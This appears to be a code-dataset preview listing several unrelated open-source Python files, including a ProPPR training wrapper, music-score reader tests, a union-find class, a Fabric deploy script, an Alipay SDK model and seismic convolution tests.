max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
scripts/proppr-helpers/pronghorn-wrapper.py | TeamCohen/ProPPR | 138 | 12774845 | <reponame>TeamCohen/ProPPR<gh_stars>100-1000
import sys
import os
import shutil
import getopt
import logging
import subprocess
import util as u
def makebackup(f):
bi=1
backup = "%s.%d" % (f,bi)
#backup_parent = "./"
#if f[0] == "/": backup_parent=""
#if f.rfind("/") > 0: backup_parent += f[:f.rfind("/")]
while os.path.isfile(backup):#backup in os.listdir(backup_parent):
bi+=1
backup = "%s.%d" % (f,bi)
return backup
if __name__=="__main__":
logging.basicConfig(level=logging.INFO)
#usage: the following arguments, followed by a "+" and a list
#of any remaining arguments to pass back to calls of the 'proppr'
#script in invokeProppr
argspec = ["src=", "src2=", "dst=", "dst2=", "stem=",
"C=", "n", #global proppr opts
"model=", "numIters=",
]
try:
optlist,args = getopt.getopt(sys.argv[1:], 'x', argspec)
except getopt.GetoptError as err:
print 'option error: ',str(err)
sys.exit(-1)
optdict = dict(optlist)
optdict['PROPPR_ARGS'] = args[1:]
queries = optdict['--src']
dbFile = optdict['--src2']
modelFile = optdict['--dst']
paramsFile = optdict['--dst2']
stem = optdict['--stem']
modelType = optdict['--model']
numIters = int(optdict['--numIters'])
eta = 1.0
if "--eta" in args:
i=args.index("--eta")
eta = float(args[i+1])
optdict['PROPPR_ARGS'] = args[1:i]+args[i+2:]
# make ground file
groundFile = stem+".grounded"
u.invokeProppr(optdict,'ground',queries,groundFile)
# make gradient file
gradFile = stem+".gradient"
u.invokeProppr(optdict,'gradient',groundFile,gradFile,"--epochs","0")
for i in range(numIters):
logging.info('training pass %i' % i)
# update pronghorn model
u.invokeHelper(optdict,'pronghorn.py',"update",gradFile,paramsFile,dbFile,modelFile,modelType,"--eta","%g"%eta)
# backup paramsFile
backup = makebackup(paramsFile)
if "--n" not in optdict:
shutil.copyfile(paramsFile,backup)
# proppr update
u.invokeProppr(optdict,'gradient',groundFile,gradFile,"--epochs","1","--initParams",backup,"--params",paramsFile,"--srw","ppr:eta=%g" % eta)
eta = eta * 0.8
# update pronghorn model
u.invokeHelper(optdict,'pronghorn.py',"update",gradFile,paramsFile,dbFile,modelFile,modelType)
|
moonlight/score/reader_test.py | lithomas1/moonlight | 288 | 12774855 | <reponame>lithomas1/moonlight
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the OMR score reader."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
import librosa
from protobuf import music_pb2
from moonlight import conversions
from moonlight.protobuf import musicscore_pb2
from moonlight.score import reader
# pylint: disable=invalid-name
Glyph = musicscore_pb2.Glyph
Note = music_pb2.NoteSequence.Note
Point = musicscore_pb2.Point
class ReaderTest(absltest.TestCase):
def testTreble_simple(self):
staff = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=50), Point(x=100, y=50)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=0),
])
notes = conversions.page_to_notesequence(reader.ScoreReader().read_page(
musicscore_pb2.Page(system=[musicscore_pb2.StaffSystem(
staff=[staff])])))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
Note(pitch=librosa.note_to_midi('B4'), start_time=0, end_time=1)
]))
def testBass_simple(self):
staff = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=50), Point(x=100, y=50)],
glyph=[
Glyph(
type=Glyph.CLEF_BASS,
x=1,
y_position=reader.BASS_CLEF_EXPECTED_Y),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=0),
])
notes = conversions.page_to_notesequence(reader.ScoreReader().read_page(
musicscore_pb2.Page(system=[musicscore_pb2.StaffSystem(
staff=[staff])])))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
Note(pitch=librosa.note_to_midi('D3'), start_time=0, end_time=1)
]))
def testTreble_accidentals(self):
staff_1 = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=50), Point(x=100, y=50)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=-6),
Glyph(type=Glyph.FLAT, x=16, y_position=-4),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=20, y_position=-4),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=30, y_position=-2),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=40, y_position=-4),
])
staff_2 = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=150), Point(x=100, y=150)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=-6),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=20, y_position=-4),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=30, y_position=-2),
Glyph(type=Glyph.SHARP, x=35, y_position=-2),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=40, y_position=-2),
Glyph(type=Glyph.NATURAL, x=45, y_position=-2),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=50, y_position=-2),
])
notes = conversions.page_to_notesequence(reader.ScoreReader().read_page(
musicscore_pb2.Page(system=[
musicscore_pb2.StaffSystem(staff=[staff_1]),
musicscore_pb2.StaffSystem(staff=[staff_2])
])))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
# First staff.
Note(pitch=librosa.note_to_midi('C4'), start_time=0, end_time=1),
Note(pitch=librosa.note_to_midi('Eb4'), start_time=1, end_time=2),
Note(pitch=librosa.note_to_midi('G4'), start_time=2, end_time=3),
Note(pitch=librosa.note_to_midi('Eb4'), start_time=3, end_time=4),
# Second staff.
Note(pitch=librosa.note_to_midi('C4'), start_time=4, end_time=5),
Note(pitch=librosa.note_to_midi('E4'), start_time=5, end_time=6),
Note(pitch=librosa.note_to_midi('G4'), start_time=6, end_time=7),
Note(pitch=librosa.note_to_midi('G#4'), start_time=7, end_time=8),
Note(pitch=librosa.note_to_midi('G4'), start_time=8, end_time=9),
]))
def testChords(self):
stem_1 = musicscore_pb2.LineSegment(
start=Point(x=20, y=10), end=Point(x=20, y=70))
stem_2 = musicscore_pb2.LineSegment(
start=Point(x=50, y=10), end=Point(x=50, y=70))
staff = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=50), Point(x=100, y=50)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
# Chord of 2 notes.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=-4, stem=stem_1),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=-1, stem=stem_1),
# Note not attached to a stem.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=30, y_position=3),
# Chord of 3 notes.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=40, y_position=0, stem=stem_2),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=60, y_position=2, stem=stem_2),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=60, y_position=4, stem=stem_2),
])
notes = conversions.page_to_notesequence(reader.ScoreReader().read_page(
musicscore_pb2.Page(system=[musicscore_pb2.StaffSystem(
staff=[staff])])))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
# First chord.
Note(pitch=librosa.note_to_midi('E4'), start_time=0, end_time=1),
Note(pitch=librosa.note_to_midi('A4'), start_time=0, end_time=1),
# Note without a stem.
Note(pitch=librosa.note_to_midi('E5'), start_time=1, end_time=2),
# Second chord.
Note(pitch=librosa.note_to_midi('B4'), start_time=2, end_time=3),
Note(pitch=librosa.note_to_midi('D5'), start_time=2, end_time=3),
Note(pitch=librosa.note_to_midi('F5'), start_time=2, end_time=3),
]))
def testBeams(self):
beam_1 = musicscore_pb2.LineSegment(
start=Point(x=10, y=20), end=Point(x=40, y=20))
beam_2 = musicscore_pb2.LineSegment(
start=Point(x=70, y=40), end=Point(x=90, y=40))
beam_3 = musicscore_pb2.LineSegment(
start=Point(x=70, y=60), end=Point(x=90, y=60))
staff = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=50), Point(x=100, y=50)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
# 2 eighth notes.
Glyph(
type=Glyph.NOTEHEAD_FILLED, x=10, y_position=-4, beam=[beam_1]),
Glyph(
type=Glyph.NOTEHEAD_FILLED, x=40, y_position=-1, beam=[beam_1]),
# 1 quarter note.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=50, y_position=0),
# 2 sixteenth notes.
Glyph(
type=Glyph.NOTEHEAD_FILLED,
x=60,
y_position=-2,
beam=[beam_2, beam_3]),
Glyph(
type=Glyph.NOTEHEAD_FILLED,
x=90,
y_position=2,
beam=[beam_2, beam_3]),
])
notes = conversions.page_to_notesequence(reader.ScoreReader().read_page(
musicscore_pb2.Page(system=[musicscore_pb2.StaffSystem(
staff=[staff])])))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
Note(pitch=librosa.note_to_midi('E4'), start_time=0, end_time=0.5),
Note(pitch=librosa.note_to_midi('A4'), start_time=0.5, end_time=1),
Note(pitch=librosa.note_to_midi('B4'), start_time=1, end_time=2),
Note(pitch=librosa.note_to_midi('G4'), start_time=2, end_time=2.25),
Note(
pitch=librosa.note_to_midi('D5'), start_time=2.25,
end_time=2.5),
]))
def testAllNoteheadTypes(self):
staff = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=50), Point(x=100, y=50)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=-6),
Glyph(type=Glyph.NOTEHEAD_EMPTY, x=10, y_position=-6),
Glyph(type=Glyph.NOTEHEAD_WHOLE, x=10, y_position=-6),
])
notes = conversions.page_to_notesequence(reader.ScoreReader().read_page(
musicscore_pb2.Page(system=[musicscore_pb2.StaffSystem(
staff=[staff])])))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
Note(pitch=librosa.note_to_midi('C4'), start_time=0, end_time=1),
Note(pitch=librosa.note_to_midi('C4'), start_time=1, end_time=3),
Note(pitch=librosa.note_to_midi('C4'), start_time=3, end_time=7),
]))
def testStaffSystems(self):
# 2 staff systems on separate pages, each with 2 staves, and no bars.
system_1_staff_1 = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=50), Point(x=100, y=50)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=-6),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=50, y_position=-2),
])
system_1_staff_2 = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=150), Point(x=100, y=150)],
glyph=[
Glyph(
type=Glyph.CLEF_BASS,
x=2,
y_position=reader.BASS_CLEF_EXPECTED_Y),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=0),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=40, y_position=2),
# Played after the second note in the first staff, although it is to
# the left of it.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=45, y_position=4),
])
system_2_staff_1 = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=250), Point(x=100, y=250)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
Glyph(type=Glyph.REST_QUARTER, x=20, y_position=0),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=50, y_position=-2),
])
system_2_staff_2 = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=250), Point(x=100, y=250)],
glyph=[
Glyph(
type=Glyph.CLEF_BASS,
x=2,
y_position=reader.BASS_CLEF_EXPECTED_Y),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=10, y_position=0),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=40, y_position=2),
])
notes = conversions.score_to_notesequence(reader.ScoreReader()(
musicscore_pb2.Score(page=[
musicscore_pb2.Page(system=[
musicscore_pb2.StaffSystem(
staff=[system_1_staff_1, system_1_staff_2]),
]),
musicscore_pb2.Page(system=[
musicscore_pb2.StaffSystem(
staff=[system_2_staff_1, system_2_staff_2]),
]),
]),))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
# System 1, staff 1.
Note(pitch=librosa.note_to_midi('C4'), start_time=0, end_time=1),
Note(pitch=librosa.note_to_midi('G4'), start_time=1, end_time=2),
# System 1, staff 2.
Note(pitch=librosa.note_to_midi('D3'), start_time=0, end_time=1),
Note(pitch=librosa.note_to_midi('F3'), start_time=1, end_time=2),
Note(pitch=librosa.note_to_midi('A3'), start_time=2, end_time=3),
# System 2, staff 1.
# Quarter rest.
Note(pitch=librosa.note_to_midi('G4'), start_time=4, end_time=5),
# System 2, staff 2.
Note(pitch=librosa.note_to_midi('D3'), start_time=3, end_time=4),
Note(pitch=librosa.note_to_midi('F3'), start_time=4, end_time=5),
]))
def testMeasures(self):
# 2 staves in the same staff system with multiple bars.
staff_1 = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=50), Point(x=300, y=50)],
glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=1,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
# Key signature.
Glyph(type=Glyph.SHARP, x=10, y_position=+4),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=20, y_position=-2),
# Accidental.
Glyph(type=Glyph.FLAT, x=40, y_position=-1),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=50, y_position=-1),
# Second bar.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=120, y_position=0),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=180, y_position=+4),
# Third bar.
# Accidental not propagated to this note.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=220, y_position=-1),
])
staff_2 = musicscore_pb2.Staff(
staffline_distance=10,
center_line=[Point(x=0, y=150), Point(x=300, y=150)],
glyph=[
Glyph(
type=Glyph.CLEF_BASS,
x=1,
y_position=reader.BASS_CLEF_EXPECTED_Y),
# Key signature.
Glyph(type=Glyph.FLAT, x=15, y_position=-2),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=20, y_position=-2),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=50, y_position=+2),
# Second bar.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=150, y_position=-2),
# Third bar.
Glyph(type=Glyph.REST_QUARTER, x=220, y_position=0),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=280, y_position=-2),
])
staff_system = musicscore_pb2.StaffSystem(
staff=[staff_1, staff_2],
bar=[_bar(0), _bar(100), _bar(200),
_bar(300)])
notes = conversions.page_to_notesequence(reader.ScoreReader().read_page(
musicscore_pb2.Page(system=[staff_system])))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
# Staff 1, bar 1.
Note(pitch=librosa.note_to_midi('G4'), start_time=0, end_time=1),
Note(pitch=librosa.note_to_midi('Ab4'), start_time=1, end_time=2),
# Staff 1, bar 2.
Note(pitch=librosa.note_to_midi('B4'), start_time=2, end_time=3),
Note(pitch=librosa.note_to_midi('F#5'), start_time=3, end_time=4),
# Staff 1, bar 3.
Note(pitch=librosa.note_to_midi('A4'), start_time=4, end_time=5),
# Staff 2, bar 1.
Note(pitch=librosa.note_to_midi('Bb2'), start_time=0, end_time=1),
Note(pitch=librosa.note_to_midi('F3'), start_time=1, end_time=2),
# Staff 2, bar 2.
Note(pitch=librosa.note_to_midi('Bb2'), start_time=2, end_time=3),
# Staff 2, bar 3.
Note(pitch=librosa.note_to_midi('Bb2'), start_time=5, end_time=6),
]))
def testKeySignatures(self):
# One staff per system, two systems.
staff_1 = musicscore_pb2.Staff(glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=5,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
# D major key signature.
Glyph(type=Glyph.SHARP, x=15, y_position=+4),
Glyph(type=Glyph.SHARP, x=25, y_position=+1),
# Accidental which cannot be interpreted as part of the key
# signature.
Glyph(type=Glyph.SHARP, x=35, y_position=+2),
Glyph(type=Glyph.NOTEHEAD_FILLED, x=45, y_position=+2), # D#5
Glyph(type=Glyph.NOTEHEAD_EMPTY, x=55, y_position=+1), # C#5
Glyph(type=Glyph.NOTEHEAD_FILLED, x=65, y_position=-3), # F#4
# New measure. The key signature should be retained.
Glyph(type=Glyph.NOTEHEAD_EMPTY, x=105, y_position=-3), # F#4
Glyph(type=Glyph.NOTEHEAD_FILLED, x=125, y_position=+1), # C#5
# Accidental is not retained.
Glyph(type=Glyph.NOTEHEAD_FILLED, x=145, y_position=+2), # D5
])
staff_2 = musicscore_pb2.Staff(glyph=[
Glyph(
type=Glyph.CLEF_TREBLE,
x=5,
y_position=reader.TREBLE_CLEF_EXPECTED_Y),
# No key signature on this line. No accidentals.
Glyph(type=Glyph.NOTEHEAD_EMPTY, x=25, y_position=-3), # F4
Glyph(type=Glyph.NOTEHEAD_EMPTY, x=45, y_position=+1), # C5
])
notes = conversions.page_to_notesequence(reader.ScoreReader().read_page(
musicscore_pb2.Page(system=[
musicscore_pb2.StaffSystem(
staff=[staff_1], bar=[_bar(0), _bar(100),
_bar(200)]),
musicscore_pb2.StaffSystem(staff=[staff_2]),
])))
self.assertEqual(
notes,
music_pb2.NoteSequence(notes=[
# First measure.
Note(pitch=librosa.note_to_midi('D#5'), start_time=0, end_time=1),
Note(pitch=librosa.note_to_midi('C#5'), start_time=1, end_time=3),
Note(pitch=librosa.note_to_midi('F#4'), start_time=3, end_time=4),
# Second measure.
Note(pitch=librosa.note_to_midi('F#4'), start_time=4, end_time=6),
Note(pitch=librosa.note_to_midi('C#5'), start_time=6, end_time=7),
Note(pitch=librosa.note_to_midi('D5'), start_time=7, end_time=8),
# Third measure on a new line, with no key signature.
Note(pitch=librosa.note_to_midi('F4'), start_time=8, end_time=10),
Note(pitch=librosa.note_to_midi('C5'), start_time=10, end_time=12),
]))
def _bar(x):
return musicscore_pb2.StaffSystem.Bar(
x=x, type=musicscore_pb2.StaffSystem.Bar.STANDARD_BAR)
if __name__ == '__main__':
absltest.main()
|
python/py-set-add.py | gajubadge11/HackerRank-1 | 340 | 12774878 | #!/usr/bin/env python3
if __name__ == "__main__":
N = int(input().strip())
stamps = set()
for _ in range(N):
stamp = input().strip()
stamps.add(stamp)
print(len(stamps)) |
inselect/lib/templates/__init__.py | NaturalHistoryMuseum/inselect | 128 | 12774895 | """Metadata templates
"""
|
data_structures/sets/quick_find_union_find.py | vinta/fuck-coding-interviews | 590 | 12774896 | # coding: utf-8
"""
Union-Find (Disjoint Set)
https://en.wikipedia.org/wiki/Disjoint-set_data_structure
"""
class QuickFindUnionFind:
def __init__(self, union_pairs=()):
self.num_groups = 0
self.auto_increment_id = 1
self.element_groups = {
# element: group_id,
}
for p, q in union_pairs:
self.union(p, q)
def __len__(self):
return self.num_groups
# O(1)
def make_group(self, element):
# Initially, every element is in its own group which contains only itself.
group_id = self.element_groups.get(element)
if group_id is None:
# Group id could be arbitrary as long as each group has an unique one.
group_id = self.auto_increment_id
self.element_groups[element] = group_id
self.num_groups += 1
self.auto_increment_id += 1
return group_id
# O(1)
def find(self, p):
try:
return self.element_groups[p]
except KeyError:
# We implicitly create a new group for the new element `p`.
return self.make_group(p)
# O(n)
def union(self, p, q):
p_group_id = self.find(p)
q_group_id = self.find(q)
if p_group_id != q_group_id:
for element, group_id in self.element_groups.items():
# Merge p into q.
if group_id == p_group_id:
self.element_groups[element] = q_group_id
self.num_groups -= 1
# O(1)
def is_connected(self, p, q):
return self.find(p) == self.find(q)
|
fabfile.py | khamidou/kite | 136 | 12774900 | <filename>fabfile.py
# fabfile for update and deploy
# it's necessary to specify an host
from fabric.api import *
from fabric.contrib.project import rsync_project
from fabric.contrib.files import upload_template
from setup_config import *
PACKAGES = ('rsync', 'puppet')
def update_sources():
rsync_project("~", "../kite", exclude=[".git/", "*.swp", "*.pyc"])
def provision():
cmd = """FACTER_server_name="%s" && export FACTER_server_name && FACTER_user_home_dir=$HOME && export FACTER_user_home_dir && puppet apply $HOME/kite/manifests/server.pp --modulepath=$HOME/kite/puppet_modules""" % env.hosts[0]
sudo(cmd)
def update():
update_sources()
provision()
def setup():
sudo("apt-get update")
for package in PACKAGES:
sudo('apt-get -y install %s' % package)
update()
def tighten():
local("ssh-copy-id %s@%s" % (env.user, env.hosts[0]))
sudo("puppet apply $HOME/kite/manifests/sshd.pp --modulepath=$HOME/kite/puppet_modules")
|
alipay/aop/api/domain/AlipayBossOrderDiagnosisGetModel.py | snowxmas/alipay-sdk-python-all | 213 | 12774917 | <reponame>snowxmas/alipay-sdk-python-all
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayBossOrderDiagnosisGetModel(object):
def __init__(self):
self._code = None
self._end_time = None
self._find_operator = None
self._order_no = None
self._out_order_no = None
self._source = None
self._start_time = None
@property
def code(self):
return self._code
@code.setter
def code(self, value):
self._code = value
@property
def end_time(self):
return self._end_time
@end_time.setter
def end_time(self, value):
self._end_time = value
@property
def find_operator(self):
return self._find_operator
@find_operator.setter
def find_operator(self, value):
self._find_operator = value
@property
def order_no(self):
return self._order_no
@order_no.setter
def order_no(self, value):
self._order_no = value
@property
def out_order_no(self):
return self._out_order_no
@out_order_no.setter
def out_order_no(self, value):
self._out_order_no = value
@property
def source(self):
return self._source
@source.setter
def source(self, value):
self._source = value
@property
def start_time(self):
return self._start_time
@start_time.setter
def start_time(self, value):
self._start_time = value
def to_alipay_dict(self):
params = dict()
if self.code:
if hasattr(self.code, 'to_alipay_dict'):
params['code'] = self.code.to_alipay_dict()
else:
params['code'] = self.code
if self.end_time:
if hasattr(self.end_time, 'to_alipay_dict'):
params['end_time'] = self.end_time.to_alipay_dict()
else:
params['end_time'] = self.end_time
if self.find_operator:
if hasattr(self.find_operator, 'to_alipay_dict'):
params['find_operator'] = self.find_operator.to_alipay_dict()
else:
params['find_operator'] = self.find_operator
if self.order_no:
if hasattr(self.order_no, 'to_alipay_dict'):
params['order_no'] = self.order_no.to_alipay_dict()
else:
params['order_no'] = self.order_no
if self.out_order_no:
if hasattr(self.out_order_no, 'to_alipay_dict'):
params['out_order_no'] = self.out_order_no.to_alipay_dict()
else:
params['out_order_no'] = self.out_order_no
if self.source:
if hasattr(self.source, 'to_alipay_dict'):
params['source'] = self.source.to_alipay_dict()
else:
params['source'] = self.source
if self.start_time:
if hasattr(self.start_time, 'to_alipay_dict'):
params['start_time'] = self.start_time.to_alipay_dict()
else:
params['start_time'] = self.start_time
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayBossOrderDiagnosisGetModel()
if 'code' in d:
o.code = d['code']
if 'end_time' in d:
o.end_time = d['end_time']
if 'find_operator' in d:
o.find_operator = d['find_operator']
if 'order_no' in d:
o.order_no = d['order_no']
if 'out_order_no' in d:
o.out_order_no = d['out_order_no']
if 'source' in d:
o.source = d['source']
if 'start_time' in d:
o.start_time = d['start_time']
return o
|
fatiando/seismic/tests/test_seismic_conv.py | XuesongDing/fatiando | 179 | 12774951 | from __future__ import absolute_import, division
import numpy as np
from numpy.testing import assert_array_almost_equal, assert_allclose
from pytest import raises
from fatiando.seismic import conv
def test_impulse_response():
"""
conv.convolutional_model raises the source wavelet as result when the model
is a centred spike, considering the dimension of the model equal to the
source wavelet
"""
w = conv.rickerwave(30., 2.e-3)
rc_test = np.zeros((w.shape[0], 20))
rc_test[w.shape[0]//2, :] = 1.
spike = conv.convolutional_model(rc_test, 30., conv.rickerwave, dt=2.e-3)
for j in range(0, rc_test.shape[1]):
assert_array_almost_equal(spike[:, j], w, 9)
def test_rc_shorter_than_wavelet():
"""
When the reflectivity series is shorter than the wavelength, the spike
response is observed like in the opposite case. The difference is that the
the ricker wavelet (or other symmetric wavelet) is shorter in the result.
"""
w = conv.rickerwave(30., 2.e-3)
rc_test = np.zeros((21, 20))
rc_test[rc_test.shape[0]//2, :] = 1
spike = conv.convolutional_model(rc_test, 30., conv.rickerwave, dt=2.e-3)
for j in range(0, rc_test.shape[1]):
wmin = (w.shape[0] - rc_test.shape[0])//2
wmax = -(w.shape[0] - rc_test.shape[0])//2
assert_array_almost_equal(spike[:, j], w[wmin:wmax], 9)
def test_reflectivity_wrong_dimensions():
"""
Velocity and density are provided as matrix or vector to reflectivity
calculation, so they must have the same dimension.
"""
vel = np.ones((10, 10))
dens = np.ones((11, 11))
raises(AssertionError, conv.reflectivity, vel, dens)
vel = np.ones((10))
dens = np.ones((11))
raises(AssertionError, conv.reflectivity, vel, dens)
def test_depth_2_time_wrong_dimensions():
"""
Velocity and property are provided as matrix to depth to time cconversion,
so they must have the same dimension.
"""
vel = np.ones((10, 10))
dens = np.ones((11, 11))
dt = 2.e-3
dz = 1.
raises(AssertionError, conv.depth_2_time, vel, dens, dt, dz)
def test_ricker():
"""
conv.rickerwave inputs must satisfy the condition for sampling and
stability, otherwise this implies in a error.
"""
f = 50.
dt = 2.e-3
raises(AssertionError, conv.rickerwave, f, dt)
|
odin/metrics/performance_summary.py | gsamarakoon/Odin | 103 | 12774964 | <reponame>gsamarakoon/Odin<filename>odin/metrics/performance_summary.py
import pandas as pd
from .compute_drawdowns import compute_drawdowns
from .compute_sharpe_ratio import compute_sharpe_ratio
def performance_summary(history, portfolio_id):
"""This function computes common performance metrics for a time-series of
portfolio equity states. For instance, the function will compute the Sharpe
ratio, the maximum drawdown, the drawdown duration, the annualized returns
and the average number of positions held at each moment in the time-series.
Parameters
----------
history: A portfolio history object.
The portfolio history object containing the equity and positional
information for a time-series corresponding to the period of performance
of a trading algorithm.
portfolio_id: String.
A unique identifier assigned to the portfolio.
"""
equity = history.equity
n = len(equity)
m = pd.DataFrame(index=[portfolio_id])
m.ix[portfolio_id, "total equity"] = equity.ix[-1]
m.ix[portfolio_id, "max equity"] = equity.max()
m.ix[portfolio_id, "max drawdown"], m.ix[portfolio_id, "max duration"] = (
compute_drawdowns(equity)
)
m.ix[portfolio_id, "sharpe ratio"] = (
compute_sharpe_ratio(history.returns)
)
m.ix[portfolio_id, "avg positions"] = history.n_positions.mean()
m.ix[portfolio_id, "annualized returns"] = (
(1. + history.returns).prod() ** (252. / n)
)
return m
|
src/filter.py | Boyploy/IMF | 108 | 12775005 | <filename>src/filter.py
# Copyright (c) 2017 <NAME> and <NAME> at SoftSec, KAIST
#
# See the file LICENCE for copying permission.
import os
import utils
import sys
def parse_name(data):
return data.split('\'')[1]
def parse_selector(data):
if 'selector' in data:
ret = data.split('selector')[1].split('\'value\':')[1].split(',')[0]
ret = int(ret.strip()[2:], 16)
return ret
return None
def merge(name, selector):
ret = name
if selector != None:
ret = '%s, %d'%(name, selector)
return ret.__hash__()
def loader(path):
ret = []
with open(path, 'rb') as f:
data = f.read().split('\n')[:-1]
idx = 0
while idx < len(data):
name = parse_name(data[idx])
selector = parse_selector(data[idx])
hval = merge(name, selector)
ret.append(hval)
idx += 2
return path, ret
def list_dir(path):
files = []
for fn in os.listdir(path):
files.append(os.path.join(path, fn))
return files
def get(l, idx):
if len(l) >idx:
return l[idx]
return None
def categorize(groups, idx):
ret = []
for group in groups:
tmp = {}
for fn, hvals in group:
hval = get(hvals, idx)
if hval not in tmp:
tmp[hval] = []
tmp[hval].append((fn, hvals))
for hval in tmp:
if hval != None :
ret.append(tmp[hval])
return ret
def pick_best(groups, n):
for group in groups:
if len(group) >= n:
return group[:n]
return None
def find_best(groups, n):
before = None
idx = 0
while len(groups) != 0:
before = groups
groups = categorize(groups, idx)
if pick_best(groups, n) == None:
return pick_best(before, n), idx
idx += 1
utils.error('find_best error')
def save_best(path, best_group, idx):
for fn, _ in best_group:
name = fn.split('/')[-1]
with open(fn, 'rb') as f:
data = f.read().split('\n')[:-1]
with open(os.path.join(path, name), 'wb') as f:
for x in data[:idx*2]:
f.write(x+'\n')
def do_filter(log_path, out_path, n, core):
log_names = list_dir(log_path)
logs = utils.multiproc(loader, log_names, core)
best_group, idx = find_best([logs], n)
save_best(out_path, best_group, idx)
def show_help():
print './filter-log [log dir] [output dir] [# of output log] [# of core]'
if __name__ == '__main__':
if len(sys.argv) !=5:
show_help()
sys.exit(-1)
n = int(sys.argv[3])
core = int(sys.argv[4])
do_filter(sys.argv[1], sys.argv[2], n, core)
|
onnx_tf/handlers/backend/conv_transpose.py | malisit/onnx-tensorflow | 1,110 | 12775016 | from onnx_tf.handlers.backend_handler import BackendHandler
from onnx_tf.handlers.handler import onnx_op
from onnx_tf.handlers.handler import partial_support
from onnx_tf.handlers.handler import ps_description
from .conv_mixin import ConvMixin
